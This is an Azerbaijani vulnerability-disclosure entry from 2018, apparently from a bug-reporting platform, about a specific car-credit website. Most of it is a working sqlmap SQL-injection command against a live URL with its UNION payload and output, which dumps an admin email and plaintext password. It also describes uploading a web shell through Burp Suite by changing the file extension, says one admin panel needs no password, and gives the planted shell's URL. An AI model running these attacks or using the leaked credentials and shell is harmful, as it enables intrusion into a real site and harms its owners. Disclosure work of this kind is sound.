Ətraflı məlumat
Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s.) əldə etmək olar
root@kali:~# sqlmap -u http://carkredit.az/az/kurumsal-detay.php?i=1 -D u765618212_cark -T kullanici -C kad,kpasswd --dump
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: i=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkxzq','MeUyGPiVljpzydkvUNiRMvMWFVkLUpITzwPBcBeR'),'qzzqq')-- VhEt
---
[06:56:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.32
back-end DBMS: MySQL 5 (MariaDB fork)
[06:56:56] [INFO] fetching entries of column(s) 'kad, kpasswd' for table 'kullanici' in database 'u765618212_cark'
[06:56:56] [INFO] the SQL query used returns 1 entries
[06:56:56] [INFO] resumed: "[email protected]","adminck"
[06:56:56] [INFO] analyzing table dump for possible password hashes
Database: u765618212_cark
Table: kullanici
[1 entry]
+-------------------+---------+
| kad | kpasswd |
+-------------------+---------+
| [email protected] | adminck |
+-------------------+---------+
Admin page / panel daxil olub sayta şəkil upload edərkən Burp Suite toolu vasitəsiylə fayl adının uzantısında dəyişiklik edərək shell upload etməm mümkündür.Bundan əlavə panel1 daxil olarkən şifrəyə ehtiyac olmur. Sayta test məqsədi ilə shell yüklənmiş amma sayta zərər vurulmamışdır.
Shell address - http://carkredit.az/images/kurumsal/bhp.php
Qeydlər
-
06 Mart 2018, 10:53
Boşluğun statusu
Mənbədən cavab gəlmədi -
17 Yanvar 2018, 09:46
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
16 Yanvar 2018, 07:44
Boşluğa bal verildi
Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 8 bal təyin etdi -
16 Yanvar 2018, 07:43
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
15 Yanvar 2018, 16:06
Boşluq əlavə edildi
Boşluq BUGemota əlavə edildi